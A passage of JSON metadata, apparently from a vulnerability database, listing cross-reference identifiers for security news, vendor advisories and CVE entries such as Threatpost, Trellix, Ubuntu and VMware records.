"THREATPOST:5F6690E820E1B143D99DD5974300C6FF", "THREATPOST:604B67FD6EFB0E72DDD87DF07C8F456D", "THREATPOST:6067B6D35C99BFCFF226177541A31F69", "THREATPOST:616358A88F9C1E69920585FDC717CF1F", "THREATPOST:619AA46DE90E000F02F634A9AA0FB8B0", "THREATPOST:61AC6ABD7798785567FFEEBEF573CDF8", "THREATPOST:61F350907297E5B2EBAE56FF04C054C7", "THREATPOST:6232FE8F8C59D8BBBD6CD0EAAD3D4AA3", "THREATPOST:62DC935BF4DB4EF8A4F1E83519B1D5CD", "THREATPOST:632A7F4B404E8A9E7D49A4895D573FDB", "THREATPOST:639050E94B84AD3926F64EF305F67AB4", "THREATPOST:63D2355B6EF0B975846E034876BC66DF", "THREATPOST:63EC8A47C53B47DB10146ABB77728483", "THREATPOST:6456A6FCBD57F31DF6ECF8310230973D", "THREATPOST:647D7D894452D9C46B3E86F5491EED49", "THREATPOST:64EE7E2569B19CDBC1F2000D27D9FC06", "THREATPOST:65B7931A3E49BA24F11CA0CB09743AEA", "THREATPOST:65DB14FD89BCDBD3391ADD70F1377E70", "THREATPOST:65F4E74D349524EBAC2DA4A4ECF22DD8", "THREATPOST:6675B640474BF8A8A3D049DB0266A118", "THREATPOST:66848A3C9B8917C8F84DFDC04DD5F6D9", "THREATPOST:66D2F7851992FD5FC9934A5FE7A68E9F", "THREATPOST:677D5A0A56D06021C8EF30D0361579C6", "THREATPOST:68B92CE2FE5B31FB78327BDD0AB7F21C", "THREATPOST:68D1078BB418B06D989E65C3972EDE28", "THREATPOST:6968030EBEDCF665121F267E466D3BA5", "THREATPOST:69A935F9472525B2FDE94FC33D6C6B70", "THREATPOST:6B7259AD7487C6D17E0A301E14AEB7CB", "THREATPOST:6B8C9E983349C1AA69D5488866DAAC1D", "THREATPOST:6B96C89C11F9A7363A1E592863892D36", "THREATPOST:6BB33156369CC57707F857196BE6B060", "THREATPOST:6C3F577E27FFC413E4196C31436CE13A", "THREATPOST:6C4662EB2B72616C90A201601B18E392", "THREATPOST:6C50260122AE142A1AA28DCFDE4EA98B", "THREATPOST:6C547AAC30142F12565AB289E211C079", "THREATPOST:6CF438E98DFFF4B4057CAFB1382A4D3C", "THREATPOST:6D28B6E17A92FE11F55907C143B3F5DD", "THREATPOST:6D61C560E85ECD0A7A35C55E74849510", "THREATPOST:6E19885760DF8E9DD66B4F30158CD173", "THREATPOST:6E270592F88355DEABA14BF404C7EDDE", "THREATPOST:6E2DD8B76555337B1AB3A01AE147EA68", "THREATPOST:6E46A05627B4B870228F4C53DD7811AE", 
"THREATPOST:6EA5AB7FCD767A01EA56D7EEF6DA0B0A", "THREATPOST:6EBEA4CC58A28C7B7DEE65B4D6FDA976", "THREATPOST:6F7C157D4D3EB409080D90F02185E728", "THREATPOST:705B9DD7E8602B9F2F913955E25C2550", "THREATPOST:70B08FC40DE9224ACE3D689EE22897C0", "THREATPOST:714DD68C5B32F675D9C75A67D7288B65", "THREATPOST:71C45E867DCD99278A38088B59938B48", "THREATPOST:71D015FE251ED550B92792FF72430841", "THREATPOST:736F24485446EFF3B3797B31CE9DAF1D", "THREATPOST:738BF7215D8F472D205FCBD28D6068E5", "THREATPOST:742E793D712CB6B2F049DBEA5373016E", "THREATPOST:75108516B2230B2FA175C2B84083F4DF", "THREATPOST:751A0E2371F134F90F39C20AB70C1E2A", "THREATPOST:752864660896CF677AF67798E68952F0", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:7642BB12A1C6458D5DDB7202B6BF1D62", "THREATPOST:765141925BCF61E1BEC4EA2E7E28C380", "THREATPOST:769E9696F176FD575D7F365CA771EFC3", "THREATPOST:76A072EE53232EB197F119EC2F7EAA74", "THREATPOST:76A5549135F9D578FFC2C8FACC135193", "THREATPOST:779B904F971138531725D1E57FDFF9DD", "THREATPOST:77DB31E826E03EA9D78EE4777986EA49", "THREATPOST:77E27FE5A07B4C4146B818CE438E0AAA", "THREATPOST:78327DA051387C43A61D82DE6B618D1F", "THREATPOST:78B8BC1F232A077BA4B03580A37C0780", "THREATPOST:78CC95FFED89068ABD2CBA57EFE1D5F8", "THREATPOST:7957677E374E9980D5154F756D4A2E00", "THREATPOST:795C39123EE147B39072C9434899E8FE", "THREATPOST:796DFA4804FEF04D3787893FCDFF97D2", "THREATPOST:7A640DBB2223135AD8DC65457AB55EBF", "THREATPOST:7ACEE8004906A83F73EF46D8EE9A83F3", "THREATPOST:7BCCC5B4AA7FB7724466FFAB585EC55D", "THREATPOST:7BE818C547990FA7A643DE9C0DE99C8C", "THREATPOST:7D0B88F224FD59AB5C49F030B02A25D9", "THREATPOST:7D2F975F60C58181C3B6726E809F10FD", "THREATPOST:7D30EC4B25275AFBC409D8619D125E65", "THREATPOST:7D43FDAB0FB38B20FBB86FFF6FD31270", "THREATPOST:7DDE7BA7A7916763BDDB5D0C565285DA", "THREATPOST:7E30033E60118E5B4B8C14689A890155", "THREATPOST:7E324E4AFB9218DCC9509FB4E2277400", "THREATPOST:7E76268AD6AABF30EEE441619FF98ABF", "THREATPOST:7EE86D3945B51C9DF608A4C06739A5F7", 
"THREATPOST:7F4C76F7EC1CB91B3A37DE64274F1EC3", "THREATPOST:7F86D903184A4B5AF689693F5950FB7D", "THREATPOST:7FF462EBFF86BEB1E7C8207D6CB07E50", "THREATPOST:7FFF8255C6708C32B41A2B0FBFEBA9B0", "THREATPOST:80110ABE631D4720D6EECA161FFCE965", "THREATPOST:80978215EBC2D47937D2F3471707A073", "THREATPOST:809BED35A98A53099CE1EC723FA950F2", "THREATPOST:80D12F3888B999E484D206D5EBA9EEA0", "THREATPOST:81021088670E95FC0EBB2F53E1FB2AD2", "THREATPOST:8105FA1422BB4E02CD95C23CC7405E26", "THREATPOST:816C2C5C3414F66AD1638248B7321FA1", "THREATPOST:81DEAED9A2A367373ADA49F1CCDCA95D", "THREATPOST:8243943141B8F18343765DA77D33F46C", "THREATPOST:827A7E3B49365A0E49A11A05A5A29192", "THREATPOST:828471E05035E11C0ED67C67E1EA8F0D", "THREATPOST:836083DB3E61D979644AE68257229776", "THREATPOST:83C349A256695022C2417F465CEB3BB2", "THREATPOST:848870C5AD3BB637321291CEF571A5F9", "THREATPOST:84E8993BD84BB1AAEE4273958FF69EDF", "THREATPOST:8549E725CF51C109F7299A0CC5FACBE9", "THREATPOST:856DD01A5D951BB0E39AE06B64DDD2A7", "THREATPOST:8594A8F12FC5C97E7E62AF7B9BE3F1AA", "THREATPOST:85DCC5523A4DCF507633F07B43FE638A", "THREATPOST:85DEC97DDAF4F3EBF731C2724329904B", "THREATPOST:8601D6EF6AB3201E582A218391B19C3F", "THREATPOST:8648A1E46B6EBE5300881DE285C7D080", "THREATPOST:870C912F079364DE3A8DADFDBE4E42D1", "THREATPOST:8836AC81C1F2D9654424EC1584E50A16", "THREATPOST:883A7DED46A4E1C743AFFBA7CDCF4400", "THREATPOST:88A5449B2DE22E7A3AD1C820BEDE1109", "THREATPOST:891CC19008EEE7B8F1523A2BD4A37993", "THREATPOST:89AA48C3C48FA427AB660EDEE6DBCBE2", "THREATPOST:8A24910206DA1810DAD81ABA313E33A7", "THREATPOST:8A372065BFA1E6839DAF0386E9D8A1F5", "THREATPOST:8A56F3FFA956FB0BB2BB4CE451C3532C", "THREATPOST:8B78588647E8548B06361DBB1F279468", "THREATPOST:8BA8EF04040D5048287D9AFFAD778130", "THREATPOST:8C45AF2306CB954ACB231C2C0C5EDA9E", "THREATPOST:8D4EA8B0593FD44763915E703BC9AB72", "THREATPOST:8D57BD39C913E8DDC450DD9EF2564C2C", "THREATPOST:8D6D4C10987CBF3434080EFF240D2E74", "THREATPOST:8D91C617AB6DA9813465DF309507F9F5", 
"THREATPOST:8E01B2E26F588D0FA5B0857DCEF926DA", "THREATPOST:8E47F9D5A51C75BA6BB0A1E286296563", "THREATPOST:8EC1069E3114E28911EA3438DA21B952", "THREATPOST:8F39618B0CB625A1C4FC439D0A7C4EB9", "THREATPOST:8FAA8C7C7378C070F0011A0B44C03726", "THREATPOST:8FACBD9A4509F71E19E07BB451FD68A0", "THREATPOST:8FFF44C70736D8E21796B9337E52F29D", "THREATPOST:90355E85731E1618F6C63A58CD426966", "THREATPOST:905F5C5FE38CC3228FF94F798221B3D5", "THREATPOST:927CAECDA58E6BC3266D14FE340589BB", "THREATPOST:932AA74F12B9D2AD0E8589AC1A2C1438", "THREATPOST:933913B1D9B9CF84D33FECFC77C2FDC8", "THREATPOST:9374ECD9CCFC891FC2F3B85DF0905A1C", "THREATPOST:93F1D3DD89A41A41475737BF84F8146C", "THREATPOST:945830C59DF62627CC3D29C4F9E9139F", "THREATPOST:945A12FF5F8B6420706F2E174B6D0590", "THREATPOST:95BDCA2096B58A0697E169C01B1E0F09", "THREATPOST:95C6723464FA4BDF541640AC24DD5E35", "THREATPOST:967CD2B765C5CD02EC0568E4797AF842", "THREATPOST:9688E067E5F287042D4EBC46107C66AF", "THREATPOST:96B85F971B8102B581B91984548004F2", "THREATPOST:96C5FAF7B7238F498D3BFD523344AA56", "THREATPOST:970C9E73DF1FF53D70DB0B66326F3CB0", "THREATPOST:9758835CBD1761636E1E39F36A79936B", "THREATPOST:97D06649A596B5E25E2A11E3D275748B", "THREATPOST:97F7CB48069CDF8038E5E49508EFA458", "THREATPOST:9812AA10EEA208EA87CD37C5F28D927F", "THREATPOST:985009AC9680D632153D78707A8949EF", "THREATPOST:985BD7D2744A9AA9EC43C5DDCD561812", "THREATPOST:987673B6BC03D7371ADC88E9BDA270D5", "THREATPOST:98AF08B524D08ABCEB115FECEE99B70F", "THREATPOST:98BE42759F35CD829E6BD3FAC7D5D1D5", "THREATPOST:98D815423018872E6E596DAA8131BF3F", "THREATPOST:98F735BF442C3126E4A9FFBB60517B96", "THREATPOST:9922BFA77AFE6A6D35DFEA77A4D195C0", "THREATPOST:99610F4016AECF953EEE643779490F30", "THREATPOST:99AD02BEC4B8423B8E050E0A4E9C4DEB", "THREATPOST:99C6C1555ACD07B4925765AED21A360C", "THREATPOST:9A9D21304DF605E55290BEAB2BDF62C5", "THREATPOST:9AA382E93ED0C2124DD69CF4DDC84EB7", "THREATPOST:9AE8698D8AABA0F11676A29CECC6D7BA", "THREATPOST:9AF5E0BBCEF3F8F871ED50F3A8A604A9", 
"THREATPOST:9B11E0EF22481CA407924C58E8C7F8C1", "THREATPOST:9B936E81D7DD33C962D98A85BAF3B7FE", "THREATPOST:9C03EBE552C67EF6E62604A81CF13C1A", "THREATPOST:9C0FA678FF748B08478CA83EAAEF83B4", "THREATPOST:9D048A14622014274EB5C5D19FEDD46A", "THREATPOST:9D96113FADFD4FBCA9C17B78B53A8C93", "THREATPOST:9DAD31CF008CF12C5C4A4EA19C77BB66", "THREATPOST:9E1DE5C0DB7F1D8747AD52E14E4C8387", "THREATPOST:9E222E9232D1D59183559B17E97BADCD", "THREATPOST:9FE968913EDA58B2C622DFD4433C05E0", "THREATPOST:A054939E56572665B8DD31C2FF1D6A79", "THREATPOST:A07707C9B30B86A691C1A24C4DC65EE6", "THREATPOST:A0EA2808DE56569B593A4E0254EC09CD", "THREATPOST:A1A03F8D19A1212209F2765F29BE892C", "THREATPOST:A1A1E1AC8DB384C8FA2988F9A9121141", "THREATPOST:A1F3E8AC4878C11E48F90AC47D165F52", "THREATPOST:A21BD1B60411A9861212745052E23AE7", "THREATPOST:A29172A6F4C253F7A464F05CCE4E3ABB", "THREATPOST:A298611BE0D737083D0CFFE084BEC006", "THREATPOST:A2C4DFB7FD998E1990946FBDE70D8050", "THREATPOST:A2FCDF5F534EC09A258F3193FDEA41A8", "THREATPOST:A2FE619CD27EBEC2F6B0C62ED026F02C", "THREATPOST:A3218B82F449C5905D1957A1C264C1C1", "THREATPOST:A45F038EA4091EC6AC414522EC7B04B6", "THREATPOST:A47D83D4BBBE115E6424755328525B9D", "THREATPOST:A4C1190B664DAE144A62459611AC5F4A", "THREATPOST:A5FC4C5797CA53E30A3426AF0843BFFE", "THREATPOST:A6096ACCB3F0C38BC6570E1DDE3E8844", "THREATPOST:A60A7647981BC9789CAECE6E9BADD30E", "THREATPOST:A653527FBB893B6568AF6B264422BD7A", "THREATPOST:A6CEBF30D4D0B3B54DC8E78CC21EBA4B", "THREATPOST:A7710EFC5AA842A252861C862A3F8318", "THREATPOST:A79D567955CD3BD88909060ECB743C9F", "THREATPOST:A7D014F320A68BD2D7BEA7FCB9349FC0", "THREATPOST:A8242348917526090B7A1B23735D5C6C", "THREATPOST:A824AE46654142C5CE71C8DDFD90D548", "THREATPOST:A844D1411E7339911EECDDBD5596A9E7", "THREATPOST:A94AAFAF28062A447CCD0F4C47FFD78C", "THREATPOST:A959F2AFFE1161A65066EACCFB0D5FCA", "THREATPOST:A98C64CB9BDDE55F51C984B749753904", "THREATPOST:A9E6DBBE61D0494D0B0C83151FEC45D0", "THREATPOST:A9EF092F5BA25CAD6C775AAE60BC318E", 
"THREATPOST:A9FAA9D15FCD97151072CF8CE16A42D9", "THREATPOST:AA7C9EFD06F74FBC5580C0384A39AA56", "THREATPOST:AB0F3CD65F9FE00689C1695CB89ADC3F", "THREATPOST:AB2F6BF7F6EC16383E737E091BA9385B", "THREATPOST:AB54F1EB518D88546D1EF9DBA5E1874B", "THREATPOST:AB80E18E0D0B4D9D91D9BF01EFBE3AC6", "THREATPOST:ABA04F8289071D7B10CAE4202D0EB18E", "THREATPOST:AC7105820BB83340E9C002EE77D4B8D6", "THREATPOST:AD20F9744EB0E2E4D282F681451B4FBD", "THREATPOST:AD3C2C361C6E263CA6B217D740D6C09F", "THREATPOST:AD4EF56E5440159F6E37D8B403C253D7", "THREATPOST:AD8A075328874910E8DCBC149A6CA284", "THREATPOST:AD96628DA2614402CC9BDEF93704870B", "THREATPOST:ADA9E95C8FD42722E783C74443148525", "THREATPOST:AE4AEC18802953FE366542717C056064", "THREATPOST:AE6ADD184BCB4B6C0DCF53BEE513E9DD", "THREATPOST:AE9B4708A7A9B6F3A24C35E15C6150A4", "THREATPOST:AFCEAC73B5337D8E7C237914CF84FC01", "THREATPOST:AFD74E86954C5A08B3F246887333BDF3", "THREATPOST:B047BB0FECBD43E30365375959B09B04", "THREATPOST:B04DD1402960F4726546F62371A02B3C", "THREATPOST:B051AFA0F0705404F1CD22704980AE7F", "THREATPOST:B11E42D0B4C56E4CC482DEF6EA0B4AC7", "THREATPOST:B1F3641CBE3AF60ECA85E3ADE7AE53CA", "THREATPOST:B2352D090C3E08DD00F192FB220C5B99", "THREATPOST:B25070E6CF075EEA6B20C4D8D25ADBE8", "THREATPOST:B2DDD79594EACBEAC10B02C533235986", "THREATPOST:B2FEDF3EA50507F526C77105093E8977", "THREATPOST:B318814572E066732E6C32CC147D95E2", "THREATPOST:B34044D3D29EE756187C0D5CDF2E19B8", "THREATPOST:B3A92C43D5FF3C53BE8EF06C687B80B6", "THREATPOST:B3C0097CBA4C334709D99BB9D477A6DD", "THREATPOST:B450AFC35B78A62F536227C18B77CB4E", "THREATPOST:B4579714760429B9531FF0E79E44C578", "THREATPOST:B4AED814955E51C42BAE9BF0A3A014B0", "THREATPOST:B4B23ADD1522DC53A0B05300F439AB03", "THREATPOST:B53DDA5AD9C6530F631391E064A0D4FA", "THREATPOST:B5B59F74FDFACADB44DBF4AE420E3189", "THREATPOST:B60886BC4FD09BD02903BB2C7FBD4A35", "THREATPOST:B62AA49BBB410F8D7406ABE4E3C4C62F", "THREATPOST:B64BFE4F560527B57D4157D27CF3E553", "THREATPOST:B71BC1DE86D81D6B48969567186B0622", 
"THREATPOST:B7280795B2A42655BE9618D06EB9520A", "THREATPOST:B787E57D67AB2F76B899BCC525FF6870", "THREATPOST:B796D491D9E59A6CE14A74FFE427D175", "THREATPOST:B7C8B7F3016D73355C4ED5E05B0E8490", "THREATPOST:B7DF4F28933004E3E4D52762786306C4", "THREATPOST:B7E1238E416DAB5F50EED6E4CC347296", "THREATPOST:B7F31FCDC8936516C077D39FEF9235AA", "THREATPOST:B8B49658F96D885BA4DC80406A2A94B3", "THREATPOST:B8EE84454BCC4614F524D8A4901907C3", "THREATPOST:B956AABD7A9591A8F25851E15000B618", "THREATPOST:B9CCF4B8B7E25CEC369B248303882707", "THREATPOST:BA0FA5036C385C822C787514850A67E5", "THREATPOST:BA70A6314CF0FB9F4A69C5BB4F1D6BC0", "THREATPOST:BAC3CD99B74F1D6CD22A123ED632AA3F", "THREATPOST:BADA213290027D414693E838771F8645", "THREATPOST:BB432D74FB2DC755C74CBEE5CF71B1E9", "THREATPOST:BB95F65906A69148A31A208D15B5EFC3", "THREATPOST:BBAE8AE32C2E8EC0271BBA9D0498A825", "THREATPOST:BC99709891AA93FC7767B53445FC2736", "THREATPOST:BD8DD789987BFB9BE93AA8FD73E98B40", "THREATPOST:BD9CDF08D7870033C1C564691CABFC16", "THREATPOST:BDA1752A66AD0D3CF8AB59CFB7A8F472", "THREATPOST:BDAFE3A8671CEAB24C02FF18A8FBA60F", "THREATPOST:BDCC3D007E103708BD7CA085B29EF2CB", "THREATPOST:BDE4A24DFC0713FBC25AB0F17931717C", "THREATPOST:BE0B5E93BD5FBBCB893FDDFE5348FDE9", "THREATPOST:BE11CFFFFEA1B470C8A24CA24D76A7C6", "THREATPOST:BE68C6E4335F8D5EEAEFCE1E8553C4C8", "THREATPOST:BF3CD27D3018BF7BD8E93D42325DAA73", "THREATPOST:C1850156F9F2124BACDC7601CCFA6B30", "THREATPOST:C23B7DE85B27B6A8707D0016592B87A3", "THREATPOST:C35731BF3D4A3F8D0B1A838FAD1A8832", "THREATPOST:C3C8E90FB9A6A06B1692D70A51973560", "THREATPOST:C4369D60DE77B747298623D4FD0299B3", "THREATPOST:C442C6ABA3916CAA62C89BC2CB6332CD", "THREATPOST:C47E4314F4EEB30F0139DF3BC8B47E01", "THREATPOST:C4B358E42FF02B710BE90F363212C84F", "THREATPOST:C4DD63E36CE4313386CAB54222BDD07A", "THREATPOST:C535D98924152E648A3633199DAC0F1E", "THREATPOST:C56525805A371C56B68CE54AB4EDB9AF", "THREATPOST:C573D419AD6106E6579CCA4A18E2DBBE", "THREATPOST:C5D967CF7CFD8422FD9ACFC1CF7277A6", 
"THREATPOST:C694354BA14A953DAFC9171CB97F0BC2", "THREATPOST:C6D292755B4D35E7E0FD459BBF6AFC7F", "THREATPOST:C754ECCAF3F8A3E6BCD670A88B3E4CAA", "THREATPOST:C8BB08507CBCCE4C217C33C15D3AA04D", "THREATPOST:C9B3ABEF738D9A1E524FB94613BA5CBA", "THREATPOST:C9C5B1554A6F4216A73108C0748E16EF", "THREATPOST:C9D2DB62AC17B411BFFF253D149E56F2", "THREATPOST:C9FBCC2A1C52CDB54C6AAB18987100F4", "THREATPOST:CAA77BB0CF0093962ECDD09004546CA3", "THREATPOST:CAA9AA939562959323A4675228C233A5", "THREATPOST:CB62075A4B035B08FDA602FF702FBB71", "THREATPOST:CC82779FBE47FD3E64708FE6233C3DAD", "THREATPOST:CD9589D22198CE38A27B7D1434FEE963", "THREATPOST:CDCABD1108763209B391D5B81AE03CF7", "THREATPOST:CDDC2C11CF6377AB44508254B9FB36DA", "THREATPOST:CEEE25A4A4491980FA1ECB491795DBA9", "THREATPOST:CF3033203781AAC4EAAE83DDCF93ADE8", "THREATPOST:CF4E98EC11A9E5961C991FE8C769544E", "THREATPOST:CF93F3E6D1E96AACFAEE9602C90A711D", "THREATPOST:D053D0BAA76AC62C5AFCB77CBFD61B6D", "THREATPOST:D098942E4435832E619282E1B92C9E0F", "THREATPOST:D11D4E32822220251B14068F9BAAD17E", "THREATPOST:D15D3ADBA9A153B33E9ADCC9E9D6E07D", "THREATPOST:D240DF7FEF328139784DBE743FF84E9B", "THREATPOST:D292185F5E299FDB7366DDAA750D6070", "THREATPOST:D358CF7B956451F0C53F878AF811409F", "THREATPOST:D3F6B40A3A2EF494FE7F0AFC7768F7CD", "THREATPOST:D40D286C87360AFDC61FCD9AD506D78F", "THREATPOST:D49075D6FFF077A542015B7F806F4E27", "THREATPOST:D4C8CD7D146990740B8339D88A3FDB84", "THREATPOST:D55054CEF7EC85590BCAC2F18EED6FFC", "THREATPOST:D587192A5DA9FB1680FF9D453F96B972", "THREATPOST:D58796CB8261B361ADF389131F955AE3", "THREATPOST:D5CE687F92766745C002851DFA8945DE", "THREATPOST:D5E02B5FD2809DCACF41DA1190794921", "THREATPOST:D6D859A31F73B00E9B6F642D4C89B344", "THREATPOST:D7D5E283A1FBB50F8BD8797B0D60A622", "THREATPOST:D7E3369CE997E9EF8A0586B994225257", "THREATPOST:D8172FCB461F5843B3391B2336A4D02F", "THREATPOST:D8CDE16C2F1722831D3106563D1F1551", "THREATPOST:D9C08A737D3D95BFF6B07A04C9479C6D", "THREATPOST:DAA85537BDD9022F1F98B328EFF7B7B9", 
"THREATPOST:DB4349EAC3DD60D03D1EBDEFF8ABAA8E", "THREATPOST:DBA639CBD82839FDE8E9F4AE1031AAF7", "THREATPOST:DC270F423257A4E0C44191BE365F25CB", "THREATPOST:DC3489917B7B9C6C1824FB61C05E82CD", "THREATPOST:DC76A72269F271882F45A521CF7C3509", "THREATPOST:DC91E1B2D30C1A0D1ED78420E79DCE86", "THREATPOST:DCEC8DA2CC98CD3F9DF8B10773BD6F01", "THREATPOST:DD0FE8D3D9D205FA5CCA65C3EBDD62D2", "THREATPOST:DD69574508B1751B9C9B01C26AE809C1", "THREATPOST:DD7A2F272ACFDE71B0A0CEC234C35876", "THREATPOST:DDB6E2767CFC8FF972505D4C12E6AB6B", "THREATPOST:DDDE126E49EC98A6A15655F564E25620", "THREATPOST:DE6A0C7ECE2973F596891B00DC078055", "THREATPOST:DEDA9E6DCA21010A215B158BFF80253C", "THREATPOST:DF2C6B28792FEC8F2404A7DC366B848F", "THREATPOST:DF45F7CBB6E670440E0A14E517EA753D", "THREATPOST:DF54323828EEC1DDCE4B2312AC6F085F", "THREATPOST:DF7C78725F19B2637603E423E56656D4", "THREATPOST:E067CFBFA163616683563A8ED34648FE", "THREATPOST:E068C231265847BA99669A8EBF0D395D", "THREATPOST:E09CE3FA2B76F03886BA3C2D4DB4D8DB", "THREATPOST:E0C8A3622AEF61D726EED997C39BADFE", "THREATPOST:E22E26BB31C17ACCC98C59076AF88CD7", "THREATPOST:E424D9CD1C692F91FBD97FDDEDBCCE34", "THREATPOST:E44D0A1C3C7C76586EBC905270FFAC34", "THREATPOST:E46805A1822D16B4725517D4B8786F57", "THREATPOST:E4FBCA31AB2D69F0292283738E873960", "THREATPOST:E539817E8025A93279C63158F37F2DFB", "THREATPOST:E60D2D0CCA5A225CA4BF5CEB5C7C3F59", "THREATPOST:E65917E5AE555B95E6FFBD69E00E682D", "THREATPOST:E6DC1F407BA6CEE26FE38C95EBB10D7A", "THREATPOST:E77302403616F2E9A6C7DA2AD2B1F880", "THREATPOST:E7C5C8276111C637456F053327590E4C", "THREATPOST:E8074A338A246BED98CF95AD4F4E9CAF", "THREATPOST:E8A3AD011F9759F38AAB48D776396878", "THREATPOST:E937B281CB0B5D1061AAD253FA4ACB53", "THREATPOST:E95FF75420C541DF65D4D795CF73B5CE", "THREATPOST:EA093948BFD7033F5C9DB5B3199BEED4", "THREATPOST:EA8274414AC42B3EF48CA27D45659736", "THREATPOST:EC28F82F6C3ECD5D0BA7471D5BA50FD6", "THREATPOST:EC55500DAF9E1467C9C94C82758F810C", "THREATPOST:ED7B090DD1289553529F8B6FD87BF467", 
"THREATPOST:EDFBDF12942A6080DE3FAE980A53F496", "THREATPOST:EE0A71A925297032000651C344890BDD", "THREATPOST:EE14785AC189E016FD2CE51464D3643D", "THREATPOST:EE5FF4DE95B4AED68C90DCB6444B6560", "THREATPOST:EE9C0062A3E6400BAF159BCA26EABB34", "THREATPOST:EED27183B3F49112A9E785EA56534781", "THREATPOST:EF7DCA1CE0B1A1B1D93B4E4F7A3A3163", "THREATPOST:EF898143DB86CE46FFBDC81DCD8E79AA", "THREATPOST:EFE8A853C0EEF9ED023CC92349BE9410", "THREATPOST:F084C5D91E4F66092F5449922C34C4CE", "THREATPOST:F1065D29808C9165285986CCB6DEBB5A", "THREATPOST:F12423DD382283B0E48D4852237679FC", "THREATPOST:F158248C80174DD4B29AE26B4B4139C0", "THREATPOST:F19F70E263B2C3D2A16C72D12F9884FC", "THREATPOST:F1E0D1BF5C51CAA730D94DB196D962D1", "THREATPOST:F261FA3F1DECA361A6DBC169065B1101", "THREATPOST:F28846A403C73C488A77B766A21BB3E5", "THREATPOST:F2BB55148C9EC48C94C05B4B2CBBBC1A", "THREATPOST:F514D796FE42C0629BD951D8664A2420", "THREATPOST:F54F8338674294DE3D323ED03140CB71", "THREATPOST:F60D403369A535076F39A474F74C925E", "THREATPOST:F61F8A6168C36EAB1584BC8044080B35", "THREATPOST:F68D705DC9A7663E4BF22574470F51D7", "THREATPOST:F701F7503777655BB413FCBEFB88C8DE", "THREATPOST:F72FDE7CB5D697EFD089937D42475E50", "THREATPOST:F73CA4042B0D13ED4A29DED46F90E099", "THREATPOST:F87A6E1CF3889C526FDE8CE50A1B81FF", "THREATPOST:F8AE6E328FD84A15442D0329003F9E9B", "THREATPOST:F8F0749C57FDD3CABE842BDFEAD33452", "THREATPOST:F9CF34A304B5CA2189D5CEDA09C8B0CB", "THREATPOST:F9FEB3F0862AAD4CC618F9737F44FA7B", "THREATPOST:FADCF664C06E3747C40C200AE681FDF8", "THREATPOST:FAE0DDDC6420E9881C1D719E13B77095", "THREATPOST:FB6C6CE8F3B4AE6846C8AB866C36F024", "THREATPOST:FBDE9552D48B698542D65DEA64890566", "THREATPOST:FBF1F4B1FB26C8B1E95965E920F985EF", "THREATPOST:FC38FE49CDC6DFAD4E78D669DBFA5687", "THREATPOST:FCB99D1A395F7D2D1BFD9F698321FA04", "THREATPOST:FCF1B008BD9B10ADDA0703FDB9CBAA04", "THREATPOST:FD699B5CBB882E8FB3DDF3341B557D27", "THREATPOST:FD8657F42A74CEDAA8D3F25A2362E6E8", "THREATPOST:FDD0C98FAA16831E7A3B7CCE3BFC67FF", 
"THREATPOST:FDF0EE0C54F947C5167E6B227E92AE63", "THREATPOST:FE41B3825C6A9EE91B00CDADD2AF9147", "THREATPOST:FE7B13B35ED49736C88C39D5279FA3D1", "THREATPOST:FEAE151B1861BE9EF40E606D5434AE00", "THREATPOST:FF8B5ACCCE8A1CE6B8A830B1D3E9E316", "THREATPOST:FFB8302BEBD76DDACC5FD08D3FF8F883"]}, {"type": "trellix", "idList": ["TRELLIX:0BACBA94111E0C364A9A1CCD8BD263DE", "TRELLIX:21227249912602DD6E11D3B19898A7FF", "TRELLIX:357BDB16F9C97C350D8CFF381DE2C04E", "TRELLIX:39F5630F37B0A70500113404A73FE414", "TRELLIX:5C6A93572FA76C5B51C026E0EE5AC599", "TRELLIX:6949BCDE9887B6759BD81365E21DD71C", "TRELLIX:751B240CA6EC691086E07D2AAFAF16BF", "TRELLIX:78F3E55FEB758A52865B523C8DE8162F", "TRELLIX:7B9C31B3E2F1A079101A700230D5A5C0", "TRELLIX:908157CFA8050AA23921170E873187E1", "TRELLIX:C3BC4A8730F3B1E4C9A82C07C31138D4", "TRELLIX:CC89DE5CDC16462BF1BBC90EE93DEE24", "TRELLIX:D3CC9DD7452C6A1D346229DE526BBE46", "TRELLIX:D57FEAD5DBF6D915430C791AC26C10CC", "TRELLIX:D8DB23FAEBC16DCFBC54050BEBBF650D", "TRELLIX:ED6978182DFD9CD1EA1E539B1EDABE6C"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:1333714193E63A3E616DE66054C5D640", "TRENDMICROBLOG:1FEAB54A2EB3929007298481113A7219", "TRENDMICROBLOG:3D0DF0AC0B5B6A3B4D80A495AF488F03", "TRENDMICROBLOG:608F794950B54766A75ABA93823701D0", "TRENDMICROBLOG:8A87E8F1BA63B9BB2E84C23288C44FDC", "TRENDMICROBLOG:9BC812C1F699A6136F37C0ACE6451F20", "TRENDMICROBLOG:C00F7F935E0D1EAD0509B4C376B20A1F", "TRENDMICROBLOG:C927C873A9E9A7AF6B74D64EFAFA6B02", "TRENDMICROBLOG:E0C479F55DF4C53A47CA2170110555AE", "TRENDMICROBLOG:E17B66F8728189778826A0F497A540F2"]}, {"type": "typo3", "idList": ["TYPO3-PSA-2021-004"]}, {"type": "ubuntu", "idList": ["USN-4510-1", "USN-4510-2", "USN-4559-1", "USN-4705-1", "USN-4705-2", "USN-5192-1", "USN-5192-2", "USN-5197-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2020-1472", "UB:CVE-2021-3156", "UB:CVE-2021-4104", "UB:CVE-2021-44228", "UB:CVE-2021-45046"]}, {"type": "veeam", "idList": ["VEEAM:KB4254"]}, {"type": "veracode", "idList": 
["VERACODE:25767", "VERACODE:27548", "VERACODE:29144", "VERACODE:33244", "VERACODE:33337", "VERACODE:33348"]}, {"type": "virtuozzo", "idList": ["VZA-2021-004", "VZA-2021-005"]}, {"type": "vmware", "idList": ["VMSA-2021-0002", "VMSA-2021-0010", "VMSA-2021-0028.1", "VMSA-2021-0028.10", "VMSA-2021-0028.11", "VMSA-2021-0028.12", "VMSA-2021-0028.13", "VMSA-2021-0028.2", "VMSA-2021-0028.3", "VMSA-2021-0028.4", "VMSA-2021-0028.6", "VMSA-2021-0028.7", "VMSA-2021-0028.8", "VMSA-2021-0028.9"]}, {"type": "wallarmlab", "idList": ["WALLARMLAB:060FBB90648BCDE11554492408AE89C8", "WALLARMLAB:1493380EEC54B493CC22B4FA116139BB", "WALLARMLAB:2AAA5E62EED6807B93FB40361B4927CB", "WALLARMLAB:7A0E7E3752712070F3E75CEF26AC2CC0", "WALLARMLAB:90D3FFE69FF928689D36310EF8B1C4F3", 